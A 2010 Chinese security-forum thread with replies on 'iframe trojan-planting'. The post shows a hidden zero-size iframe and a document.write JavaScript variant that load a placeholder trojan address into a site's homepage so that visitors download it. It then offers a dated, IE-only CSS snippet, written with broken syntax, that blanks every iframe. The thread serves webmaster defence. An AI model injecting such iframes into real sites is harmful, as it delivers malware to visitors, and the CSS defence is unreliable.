首页
社区
课程
招聘
[原创]防框架挂马安全代码
发表于: 2010-3-26 09:09 4524

[原创]防框架挂马安全代码

2010-3-26 09:09
4524
我们来看看框架挂马有那些:第一是普通的做法<iframe  src="您的网马地址"   height=0  width=0></iframe>;

第二种是JS 调用框架挂马,先写一个JS文件(命名为JS.JS)document.write('<iframe src="您的网马地址"  height=0    w idth=0></frame>')  然后写把如下代码插入网站首页中调用JS.JS: <script> src=js.js</script>,这样别人浏览被我们插入代码的网页时,您的网马就会自动下载运行,也就达到挂马的目的。上面这些是一些比较简单普遍的挂马方式,还有比较深层的挂马方式(比如IIS服务器挂马,ASP封装挂马,window.status伪装挂马等等)最近黑基这边事情比较多,我有时间会给大家发上来,给大家参考。   

         站在一名网站管理员的角度,我们应该怎样防御这样呢?我们可以这样,在我们的网页中插入如下代码:<style>iframe {v:expression(this.src='about:blank' this.outerhtml='');}</style>   这样所有的框架挂马都被屏蔽,让那些小菜的马无法运行。

         好了,今天就些吧,主要是对付那些小菜鸟(深层次的防御涉及到服务器的安全加固),如果你的网站经常给人挂马,可以在加固服务器安全的基础上试试这种防御方法,让你的网站更加安全。

[课程]Android-CTF解题方法汇总!

收藏
免费 0
支持
分享
最新回复 (12)
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
感激大牛
2010-3-26 12:57
0
雪    币: 196
活跃值: (135)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
3
感激大牛....
2010-3-26 13:56
0
雪    币: 206
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
这样不是杀敌一千、自损八百?为了防止这种攻击而把iframe功能给屏蔽了,值不值得啊?
2010-3-28 19:48
0
雪    币: 122
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
做任何事情都有其两面性。。。
2010-4-2 17:11
0
雪    币: 3
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
不错的大牛 顶贴
2010-4-4 01:52
0
雪    币: 225
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
不一定非要怎样,根据自己的要求去设定就好了。这种方法不建议。一般站长自己都不懂html更别说采用方法了。装个好杀软比这样要好很多。
2010-4-9 04:38
0
雪    币: 213
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
8
黑基的?杂不认识呢
2010-4-28 16:25
0
雪    币: 131
活跃值: (98)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
9
不用iframe不是一样可以挂
2010-4-29 08:36
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
10
HTML5针对iframe搞了个沙盘模式,不知道有没有用
2010-5-1 01:12
0
雪    币: 11
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
是不是就是  在框架内 运用虚拟机技术?
2010-5-20 20:25
0
雪    币: 69
活跃值: (155)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
Esc
12
都进去了,直接Delete!
2010-5-21 03:32
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
学习了。。。感谢lz
2010-6-5 00:25
0
游客
登录 | 注册 方可回帖
返回
//